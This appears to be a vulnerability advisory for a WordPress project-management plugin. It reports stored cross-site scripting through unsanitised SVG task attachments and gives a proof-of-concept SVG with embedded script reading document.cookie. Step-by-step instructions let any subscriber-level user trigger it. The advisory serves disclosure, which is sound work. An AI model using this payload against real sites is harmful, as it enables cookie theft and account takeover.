The plugin does not validate and sanitise tasks' attachments, which could allow any authenticated user (such as a subscriber) creating a task to perform stored Cross-Site Scripting by attaching a malicious SVG file.
Create an SVG with the following content:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript"> alert(document.cookie); </script>
</svg>

As any authenticated user, such as a subscriber:

- Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks
- Choose any task (create one if there aren't any)
- Focus on "Write a comment".
- Click on "Attach Files" and select the SVG created above
- Click on "Send".
- View the attached SVG by clicking on its URL (https://example.com/?wppm_attachment=86&tid=1&tac=OtjI9JpnQU), which will trigger the XSS
Rizacan Tufan
Yes
2022-09-15 (about 8 months ago)